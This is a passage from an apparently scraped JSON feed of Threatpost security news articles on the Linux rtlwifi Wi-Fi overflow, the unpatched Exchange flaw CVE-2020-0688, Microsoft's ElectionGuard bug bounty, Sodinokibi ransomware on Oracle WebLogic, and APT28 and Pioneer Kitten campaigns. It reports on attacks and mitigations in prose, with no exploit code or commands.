dynamic variables). That excess data in turn corrupts nearby space in memory and could alter other data, opening the door for malicious attacks. This specific flaw could enable attackers to launch a variety of attacks \u2013 from crashing vulnerable Linux machines to full takeover.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe bug is serious\u2026 if an attacker is currently using that Realtek driver (rtlwifi), then it\u2019s vulnerable to this bug and someone on a wireless distance range can potentially attack him,\u201d Nico Waisman, principal security engineer at Github, who discovered the bug and posted his findings [Thursday on Twitter](<https://twitter.com/nicowaisman/status/1184864519316758535?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1184864519316758535&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost.php%3Fpost%3D149325%26action%3Dedit>), told Threatpost.\n\n> Found this bug on Monday. An overflow on the linux rtlwifi driver on P2P (Wifi-Direct), while parsing Notice of Absence frames. \nThe bug has been around for at least 4 years <https://t.co/rigXOEId29> [pic.twitter.com/vlVwHbUNmf](<https://t.co/vlVwHbUNmf>)\n> \n> \u2014 Nico Waisman (@nicowaisman) [October 17, 2019](<https://twitter.com/nicowaisman/status/1184864519316758535?ref_src=twsrc%5Etfw>)\n\nThe vulnerable piece of the rtlwifi driver is a feature called the Notice of Absence protocol. This protocol helps devices autonomously power down their radio to save energy. The flaw exists in how the driver handles Notice of Absence packets: It does not check certain packets for a compatible length, so an attacker could add specific information elements that would cause the system to crash.\n\nAccording to Waisman, to exploit the flaw an attacker would send a \u201cmalicious\u201d packet that will trigger the vulnerability on the Linux machine. This can be done if the attacker is within radio range of the vulnerable device. There is no need for an attacker to have any sort of authentication, he said.\n\nThe flaw can be exploited to trigger various attacks, he added.\n\n\u201cThe vulnerability triggers an overflow, which means it could make Linux crash or if a proper exploit is written (which is not trivial), an attacker could obtain remote code-execution,\u201d Waisman told Threatpost.\n\nVersions through 5.3.6 of the Linux kernel operating system are impacted \u2014 and researchers said it has been in existence for four years before discovery. In response, the Linux kernel team has [developed a patch](<https://www.mail-archive.com/linux-kernel@vger.kernel.org/msg2132949.html>) which is currently under revision but has not yet been incorporated into the Linux kernel.\n\nRealtek did not respond to a request for comment from Threatpost.\n\n**_What are the top cybersecurity issues associated with privileged account access and credential governance? Experts from Thycotic on Oct. 23 will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree &amp; Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-18T15:55:37", "type": "threatpost", "title": "Four-Year-Old Critical Linux Wi-Fi Bug Allows System Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-17666", "CVE-2020-0688"], "modified": "2019-10-18T15:55:37", "id": "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "href": "https://threatpost.com/critical-linux-wi-fi-bug-system-compromise/149325/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:11:08", "description": "Over half of exposed Exchange servers are still vulnerable to a severe bug that allows authenticated attackers to execute code remotely with system privileges \u2013 even eight months after Microsoft issued a fix.\n\nThe vulnerability in question ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) exists in the control panel of Exchange, Microsoft\u2019s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors.\n\nHowever, new telemetry found that out of 433,464 internet-facing Exchange servers observed, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers are still vulnerable to the flaw.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThere are two important efforts that Exchange administrators and infosec teams need to undertake: verifying deployment of the update and checking for signs of compromise,\u201d said Tom Sellers with Rapid7 [in a Tuesday analysis](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>).\n\n> Speaking of Exchange, we took another look at Exchange CVE-2020-0688 (any user -&gt; SYSTEM on OWA). \n> \n> It's STILL 61% unpatched. \n> \n> This is dangerous as hell and there is a reliable Metasploit module for it.\n> \n> See the UPDATED information on the ORIGINAL blog:<https://t.co/DclWb3T0mZ>\n> \n> \u2014 Tom Sellers (@TomSellers) [September 29, 2020](<https://twitter.com/TomSellers/status/1310991824828407808?ref_src=twsrc%5Etfw>)\n\nResearchers warned [in a March advisory](<https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/>) that unpatched servers are being exploited in the wild by unnamed APT actors. Attacks [first started in late February](<https://www.tenable.com/blog/cve-2020-0688-microsoft-exchange-server-static-key-flaw-could-lead-to-remote-code-execution?utm_source=charge&utm_medium=social&utm_campaign=internal-comms>) and targeted \u201cnumerous affected organizations,\u201d researchers said. They observed attackers leverage the flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks, post-exploitation.\n\n[Previously, in April](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>), Rapid7 researchers found that more than 80 percent of servers were vulnerable; out of 433,464 internet-facing Exchange servers observed, at least 357,629 were open to the flaw (as of March 24). Researchers used Project Sonar, a scanning tool, to analyze internet-facing Exchange servers and sniff out which were vulnerable to the flaw.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/30094515/cve-2020-0688_vulnerability_status.png>)\n\nExchange build number distribution status for flaw. Credit: Rapid7\n\nSellers urged admins to verify that an update has been deployed. The most reliable method to do so is by checking patch-management software, vulnerability-management tools or the hosts themselves to determine whether the appropriate update has been installed, he said.\n\n\u201cThe update for CVE-2020-0688 needs to be installed on any server with the Exchange Control Panel (ECP) enabled,\u201d he said. \u201cThis will typically be servers with the Client Access Server (CAS) role, which is where your users would access the Outlook Web App (OWA).\u201d\n\nWith the ongoing activity, admins should also determine whether anyone has attempted to exploit the vulnerability in their environment. The exploit code that Sellers tested left log artifacts in the Windows Event Log and the IIS logs (which contain HTTP server API kernel-mode cache hits) on both patched and unpatched servers: \u201cThis log entry will include the compromised user account, as well as a very long error message that includes the text invalid viewstate,\u201d he said.\n\nAdmins can also review their IIS logs for requests to a path under /ecp (usually /ecp/default.aspx), Sellers said, These should contain the string __VIEWSTATE and __VIEWSTATEGENERATOR \u2013 and will have a long string in the middle of the request that is a portion of the exploit payload.\n\n\u201cYou will see the username of the compromised account name at the end of the log entry,\u201d he said. \u201cA quick review of the log entries just prior to the exploit attempt should show successful requests (HTTP code 200) to web pages under /owa and then under /ecp.\u201d\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.\n", "cvss3": {}, "published": "2020-09-30T14:34:00", "type": "threatpost", "title": "Microsoft Exchange Servers Still Open to Actively Exploited Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-5135"], "modified": "2020-09-30T14:34:00", "id": "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "href": "https://threatpost.com/microsoft-exchange-exploited-flaw/159669/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T22:24:12", "description": "As the 2020 presidential election draws closer and primary season looms around the corner, Microsoft has launched a bug-bounty program specifically aimed at its ElectionGuard product, which the software giant has positioned as performing \u201cend-to-end verification of elections.\u201d\n\nElectionGuard is a free open-source software development kit that secures the results of elections and makes those results securely available to approved third-party organizations for validation; it also allows individual voters to confirm that their votes were correctly counted.\n\nThe bounty program invites security researchers (\u201cwhether full-time cybersecurity professionals, part-time hobbyists or students\u201d) to probe ElectionGuard for high-impact vulnerabilities and share them with Microsoft under Coordinated Vulnerability Disclosure (CVD). Eligible submissions with a \u201cclear, concise proof of concept\u201d (PoC) are eligible for awards ranging from $500 to $15,000 depending on the severity of the bug found.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn-scope products include the ElectionGuard specification and documentation (such as data-transmission issues like information leakage); the verifier reference implementation (bugs that allow attackers to say elections are valid when they aren\u2019t); and C Cryptography implementations (such as bugs that allow key or vote discovery by observing SDK messages).\n\nThe program is one prong of the company\u2019s wider \u201cDefending Democracy\u201d program, under which Microsoft has pledged to [protect campaigns from hacking](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>); increase political [advertising transparency](<https://threatpost.com/google-fine-privacy-gdpr/141055/>) online; explore ways to [protect electoral processes](<https://threatpost.com/voting-machines-hacked-with-ease-at-def-con/127101/>) with technology; and defend against [disinformation campaigns](<https://threatpost.com/twitter-5000-accounts-disinformation-campaigns/145764/>).\n\nResearchers said that the bug-bounty program is a welcome \u2013 if limited \u2013 addition to the private sector\u2019s response to election meddling. However, they also highlighted the need for a more holistic effort, united across both public and private organizations.\n\n\u201c[Russian interference in the 2016 election](<https://threatpost.com/justice-department-indicts-12-russian-nationals-tied-to-2016-election-hacking/133978/>) gave cybersecurity a quick moment in the political spotlight,\u201d Monique Becenti, product and channel specialist at SiteLock, told Threatpost. \u201cBut when the cost of cybercrime reaches billions of dollars each year, election security needs to be top of mind for our political leaders. Since 2016, election security bills have been slow-moving. Some companies, like Microsoft, are rallying the security industry to address this issue head-on. The ElectionGuard Bounty program is an important step in the right direction, but we need political leaders who will champion this issue and ensure constituents and our elections stay secure.\u201d\n\nNot everyone is excited about the move; Richard Gold, head of security engineering at Digital Shadows, said that the program is limited to Microsoft\u2019s proprietary solution, which makes its real-world impact limited at best.\n\n\u201cIt\u2019s great that companies like Microsoft are launching programs like this, but the question remains: how much is this kind of bug bounty going to be used?\u201d he told Threatpost. \u201cBug-bounty programs need to be applied consistently in order to have real impact. There is a trade off in time and resources that needs to be overcome in order for a program like this to be worthwhile.\u201d\n\n\u201cMicrosoft is committed to strengthening our partnership with the security research community as well as pursuing new areas for security improvement in emerging technology,\u201d said Jarek Stanley, senior program manager at the Microsoft Security Response Center, in [announcing the program](<https://msrc-blog.microsoft.com/2019/10/18/introducing-the-electionguard-bounty-program/>). \u201cWe look forward to sharing more bounty updates and improvements in the coming months.\u201d\n\nMicrosoft paid $4.4 million in bounty rewards between July 1, 2018 and June 30 across 11 bounty programs, with a top award of $200,000.\n\n**_What are the top cybersecurity issues associated with privileged account access and credential governance? Experts from Thycotic on Oct. 23 will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree &amp; Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-18T20:04:29", "type": "threatpost", "title": "Microsoft Tackles Election Security with Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-18T20:04:29", "id": "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "href": "https://threatpost.com/microsoft-election-security-bug-bounties/149347/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:51", "description": "A recently-disclosed critical vulnerability in Oracle WebLogic is being actively exploited in a slew of attacks, which are distributing a never-before-seen ransomware variant.\n\nThe recently-patched flaw exists in Oracle\u2019s WebLogic server, used for building and deploying enterprise applications. The deserialization vulnerability ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)\u200b) is being exploited to spread what researchers with Cisco Talos in a [Tuesday analysis](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>) dubbed the \u201cSodinokibi\u201d ransomware.\n\n\u201cThis is the first time we have seen this ransomware being used in the wild,\u201d Jaeson Schultz, technical leader, at Cisco Talos, told Threatpost. \u201cThis new ransomware first emerged on April 26. Part of what makes this ransomware stick out is the fact that attackers were using a 0-day vulnerability to install it. Talos is continuing to analyze the ransomware itself. It\u2019s obfuscated and there are several anti-analysis tricks.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. The flaw was patched on April 26 \u2013 but researchers said that attackers have been exploiting the flaw since April 21.\n\n\u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30140000/oracle-weblogic-flaw.png>)\n\nThe ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with a vulnerable Oracle WebLogic server.\n\nWhile Cisco Talos researchers would not disclose further details to Threatpost regarding the victim of this particular ransomware attack \u2013 such as the company size or industry \u2013 they said they do think multiple victims are being targeted.\n\n\u201cAttackers were ultimately successful at encrypting a number of customer systems during this incident,\u201d they said.\n\nWhile typically ransomware variants require some form of user interaction \u2013 such as opening an attachment to an email message or clicking on a malicious link, this incident was abnormal as attackers simply leveraged the Oracle WebLogic vulnerability, researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30135836/ransomware-note.png>)\n\nRansomware Note\n\nOnce attackers found a vulnerable server, they sent an HTTP POST request to that server. The request contained a PowerShell command, which downloaded a file called \u201cradm.exe.\u201d That then saved the ransomware locally and executed it.\n\nOnce downloaded, the ransomware encrypted the victim\u2019s systems and displayed a ransom note to them, directing victims to a page on the Tor network to a domain (decryptor[.]top) the public web, which was registered on March 31 this year.\n\nAfter victims visited said pages, they were directed to create a Bitcoin wallet and purchase $2500 (USD) worth of Bitcoin. They then were directed to transfer the Bitcoin to an address provided by the attackers. After the transaction is confirmed on the Blockchain, the attackers updates the page with a link to download the decryptor, researchers told Threatpost.\n\nResearchers also noted that, once downloaded, the malicious file executed \u200bvssadmin.exe, a legitimate utility bundled with Windows that enables allows administrators to manage the shadow copies that are on the computer. Shadow copies are a technology that enables systems to take automatic backup copies of computer files.\n\nBecause attackers executed this feature, it allows them to access and delete the automatic backups \u2013 making it harder for victims to recover their data: \u201cThis action\u200b is a common [tactic] of ransomware to prevent users from easily recovering their data,\u201d researchers said. \u201cIt attempts to delete default Windows backup mechanisms, otherwise known as \u2018shadow copies,\u2019 to prevent recovery of the original files from these backups.\u201d\n\nWhile researchers told Threatpost they\u2019re not sure who is behind the attack, they did note that after the ransomware deployment, attackers followed up with an additional exploit attempt (of the CVE-2019-2725 vulnerability) approximately eight hours later.\n\nInterestingly, this attack utilized the infamous [Gandcrab ransomware](<https://threatpost.com/tag/gandcrab-ransomware/>) (v5.2), making researchers believe that the attacker is a Gandcrab ransomware affiliate member, Schultz told Threatpost.\n\n\u201cWe find it strange the attackers would choose to distribute additional, different ransomware on the same target,\u201d researchers said. \u201cSodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.\u201d\n\nLooking forward, researchers said that they expect attacks on Oracle\u2019s WebLogic servers to increase, and urge users to update immediately. This flaw was not part of Oracle\u2019s regularly-scheduled quarterly patch earlier in [April](<https://threatpost.com/oracle-squashes-53-critical-bugs-in-april-security-update/143845/>), where it fixed 53 other critical vulnerabilities in Oracle products.\n\n\u201cDue to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725,\u201d they said.\n", "cvss3": {}, "published": "2019-04-30T19:20:13", "type": "threatpost", "title": "New 'Sodinokibi' Ransomware Exploits Critical Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-04-30T19:20:13", "id": "THREATPOST:4DD624E32718A8990263A37199EEBD02", "href": "https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-07-07T11:01:50", "description": "U.S. and U.K. authorities are warning that the APT28 advanced-threat actor (APT) \u2013 a.k.a. Fancy Bear or Strontium, among other names \u2013 has been using a [Kubernetes](<https://threatpost.com/windows-containers-malware-targets-kubernetes/166692/>) cluster in a widespread campaign of brute-force password-spraying attacks against hundreds of government and private sector targets worldwide.\n\nThe joint alert ([PDF](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)) \u2013 posted on Thursday by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the U.K.\u2019s National Cyber Security Centre (NCSC) \u2013 attributes the campaign to the APT group, which has [long been suspected](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) of having ties to the General Staff Main Intelligence Directorate (GRU) arm of Russia\u2019s military intelligence.\n\nThe attacks have been launched since at least mid-2019 through early 2021 and are \u201calmost certainly still ongoing,\u201d according to the advisory.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe threat actor has targeted \u201ca significant amount\u201d of its activity at organizations using [Microsoft Office 365 cloud services](<https://threatpost.com/microsoft-office-365-attacks-google-firebase/163666/>), authorities warned.\n\nThe attackers are after the passwords of people who work at sensitive jobs in hundreds of organizations worldwide, including government and military agencies in the U.S. and Europe, defense contractors, think tanks, law firms, media outlets, universities and more.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/02101634/APT28-targets-e1625235408497.jpg>)\n\nAPT28 targets being bombarded by brute-force attacks. Source: CISA advisory.\n\nOnce the threat actors get valid credentials, they\u2019re using them for initial access, persistence, privilege escalation and defense evasion, among other things. The actors are using the passwords in conjunction with exploits of publicly known vulnerabilities, such as ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) \u2013 a vulnerability in the [control panel of Microsoft\u2019s Exchange Server](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) \u2013 and [ CVE 2020-17144](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17144>), also found in Exchange Server. Both these and other vulnerabilities can be used for remote code execution (RCE) and further access to target networks.\n\nAfter APT28 gains remote access, it uses a slew of well-known tactics, techniques and procedures (TTPs) \u2013 including HTTP(S), IMAP(S), POP3, and [NTLM](<https://threatpost.com/microsoft-addresses-ntlm-bugs-that-facilitate-credential-relay-attacks/126752/>) (a suite of Microsoft security protocols used for authentication \u2013 in addition to Kubernetes-powered password-spraying in order to gain lateral movement, to evade defenses and to sniff out more information from the target networks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/02103812/TTPs--e1625236705468.jpg>)\n\nExample of several TTPs used together as part of this type of brute-force campaign. Source: CISA advisory.\n\nGiven how vastly different the target networks\u2019 structures are, the actors are using an equally diverse mix of TTPs. The alert included 21 samples of known TTPs. One example is the TTPs used to exploit public-facing apps: APT28 has been tracked using the two previously mentioned bugs to gain privileged RCE on vulnerable Microsoft Exchange servers, which in some case happened after valid credentials were identified via password spray, given that exploitation of the vulnerabilities requires authentication as a valid user.\n\n## How Kubernetes Fits In\n\nAuthorities said that to obfuscate its true origin and to provide \u201ca degree of anonymity,\u201d the Kubernetes cluster used in these attacks normally routes brute-force authentication attempts through Tor and commercial [VPN services](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>), including CactusVPN, IPVanish, NordVPN, ProtonVPN, Surfshark and WorldVPN. If they\u2019re not using [Tor](<https://threatpost.com/unencrypted-mobile-traffic-tor-network-leaks-pii/149200/>) or a VPN, the actors are sometimes using nodes in the Kubernetes cluster.\n\nGiven the \u201cscalable nature of the password spray-capability,\u201d specific indicators of compromise (IOC) can be easily altered to bypass IOC-based mitigation, the advisory explained. Thus, while the advisory lists specific indicators, authorities also advised organizations to consider denying all inbound traffic from known Tor nodes and public VPN services to Exchange servers or portals that don\u2019t normally see that kind of access.\n\n## Mitigations\n\nBeyond authorities\u2019 suggestion to consider shutting off the spigot on Tor and VPN services where that makes sense, the advisory also listed a number of standard and not-so-standard mitigations, summed up in an executive summary:\n\n\u201cNetwork managers should adopt and expand usage of multi-factor authentication to help counter the effectiveness of this capability. Additional mitigations to ensure strong access controls include time-out and lock-out features, the mandatory use of strong passwords, implementation of a Zero Trust security model that uses additional attributes when determining access, and analytics to detect anomalous accesses.\u201d\n\nBut one expert \u2013 Tom (TJ) Jermoluk, CEO and co-founder of Beyond Identity, raised a hairy eyeball at the notion that stronger passwords can do anything to protect against password spraying, particularly when it comes on top of a concerted effort to gather valid credentials.\n\n\u201cRussian GRU agents and other state actors like those involved in SolarWinds \u2013 and a range of financially motivated attackers (e.g., ransomware) \u2013 all use the same \u2018password spraying\u2019 brute force techniques,\u201d he told Threatpost in an email on Friday. \u201cWhy? Because they are so effective. Unfortunately, a misunderstanding of this technique is leading to shockingly flawed advice like that given in the NSA advisory which, in part, recommends \u2018mandating the use of stronger passwords.'\u201d\n\nHe added, \u201cThe credential-gathering that preceded the password spraying campaign most certainly collected short and strong passwords. And the Russian Kubernetes cluster used in the attack was capable of spraying \u2018strong passwords.'\u201d\n\n## The Continuing Threat\n\nOn Friday, Russia\u2019s embassy in Washington issued a statement on [Facebook](<https://www.facebook.com/RusEmbUSA>) in which it \u201ccategorically\u201d rejected the allegations, noting that \u201cWe emphasize that fighting against cybercrime is an inherent priority for Russia and an integral part of its state policy to combat all forms of crime.\u201d\n\nJust a few of the recent campaigns attributed to Russia\u2019s military unit:\n\n**April 2021**: The [NSA linked APT29 ](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>)to Russia\u2019s Foreign Intelligence Services (SVR), as the U.S. formally attributed the recent [SolarWinds supply-chain attacks](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n**November 2020: **Microsoft reported that APT28 joined in the feeding frenzy as one of three major APTs that [went after pharma](<https://threatpost.com/russia-north-korea-attacking-covid-19-vaccine-makers/161205/>) and clinical organizations involved in COVID-19 research.\n\n**September 2020**: Microsoft issued a warning that members of the Russian military unit were attempting to [harvest Office 365](<https://threatpost.com/apt28-theft-office365-logins/159195/>) credentials in the runup to U.S. elections, targeting mainly election-related organizations. The company noted at the time that the group had attacked more than 200 organizations last year, including political campaigns, advocacy groups, parties and political consultants. Those targets included think-tanks such as The German Marshall Fund of the United States, The European People\u2019s Party, and various U.S.-based consultants serving Republicans and Democrats.\n\nSaying that we can\u2019t let down our guards would be quite the understatement, according to Check Point spokesperson Ekram Ahmed: \u201cGRU continues to be a threat that we can\u2019t ignore,\u201d he observed to Threatpost on Friday. \u201cThe scale, reach and pace of their operations are alarming, especially with the 2021 Summer Olympics around the corner.\u201d\n\nIn fact, in October 2020, the U.K.\u2019s NCSC, in a joint operation with U.S. intelligence, said that that\u2019s exactly what was in the works, accusing Russian military intelligence services of [planning a cyberattack](<https://www.theguardian.com/world/2020/oct/19/russia-planned-cyber-attack-on-tokyo-olympics-says-uk>) on the [Japanese-hosted Olympics](<https://www.sportingnews.com/au/other-sports/news/tokyo-olympic-games-2021-will-they-go-ahead/1gv928rhuuo0o1ucb6481onp4m>), scheduled to start in three weeks on July 23 after having been postponed due to the pandemic.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-02T16:14:14", "type": "threatpost", "title": "Kubernetes Used in Brute-Force Attacks Tied to Russia\u2019s APT28", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-17144"], "modified": "2021-07-02T16:14:14", "id": "THREATPOST:B25070E6CF075EEA6B20C4D8D25ADBE8", "href": "https://threatpost.com/kubernetes-brute-force-attacks-russia-apt28/167518/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). All three are exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently. ](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>)A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": 